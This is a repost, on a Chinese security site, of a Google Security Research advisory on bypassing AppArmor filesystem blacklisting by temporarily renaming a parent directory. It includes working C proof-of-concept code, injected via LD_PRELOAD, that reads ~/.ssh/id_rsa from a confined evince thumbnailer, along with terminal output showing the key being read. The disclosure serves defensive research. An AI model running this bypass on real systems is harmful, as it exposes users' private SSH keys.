首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AppArmor Filesystem Blacklisting Bypass
来源:Google Security Research 作者:Google 发布时间:2018-09-28  
AppArmor: filesystem blacklisting can be bypassed by moving parents 




Some AppArmor policies attempt to blacklist access to specific directories while broadly granting write access to everything else. For example, the Firefox profile uses the user-files abstraction, which broadly permits write access to owned files under /home while using the private-files abstraction to block access to some files like ~/.bashrc. Similar thing for the evince thumbnailer.

This is broken because if an attacker has write access to ~/.ssh/, but access to ~/.ssh/** is blocked, it is possible to rename ~/.ssh to ~/.ssh_, access ~/.ssh_/id_rsa, and rename ~/.ssh_ back to ~/.ssh.

Demo with evince:

user@ubuntu-18-04-vm:~/evince_thumbnailer_apparmor$ cat preload5.c
#define _GNU_SOURCE
#include <stdlib.h>
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <err.h>

__attribute__((constructor)) static void entry(void) {
  printf("constructor running from %s\n", program_invocation_name);

  errno = 0;
  int fd = open("/home/user/.ssh/id_rsa", O_RDONLY);
  printf("open id_rsa direct: %d, error = %m\n", fd);

  if (rename("/home/user/.ssh", "/home/user/.sshx"))
    err(1, "rename");

  errno = 0;
  fd = open("/home/user/.sshx/id_rsa", O_RDONLY);
  printf("open id_rsa indirect: %d, error = %m\n", fd);

  if (rename("/home/user/.sshx", "/home/user/.ssh"))
    err(1, "rename2");

  char buf[1001];
  errno = 0;
  int res = read(fd, buf, 1000);
  printf("read res: %d, error = %m\n", res);
  if (res > 0) {
    buf[res] = 0;
    puts(buf);
  }

  exit(0);
}
user@ubuntu-18-04-vm:~/evince_thumbnailer_apparmor$ sudo gcc -shared -o /usr/lib/x86_64-linux-gnu/libevil_preload.so preload5.c -fPIC && LD_PRELOAD=/usr/lib/x86_64-linux-gnu/libevil_preload.so evince-thumbnailer
constructor running from evince-thumbnailer
open id_rsa direct: -1, error = Permission denied
open id_rsa indirect: 3, error = Success
read res: 1000, error = Success
-----BEGIN RSA PRIVATE KEY-----
[...]
user@ubuntu-18-04-vm:~/evince_thumbnailer_apparmor$ 


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.



Found by: jannh


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CrossFont 7.5 - Denial of Serv
·Linux Kernel 2.6.x / 3.10.x /
·TransMac 12.2 - Denial of Serv
·Snes9K 0.0.9z - Denial of Serv
·WebKit - 'WebCore::RenderTreeB
·Zahir Enterprise Plus 6 build
·WebKit - 'WebCore::SVGTextLayo
·H2 Database 1.4.196 - Remote C
·WebKit - 'WebCore::RenderLayer
·FTP Voyager 16.2.0 - Denial of
·WebKit - 'WebCore::SVGTRefElem
·NICO-FTP 3.0.1.19 - Buffer Ove
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved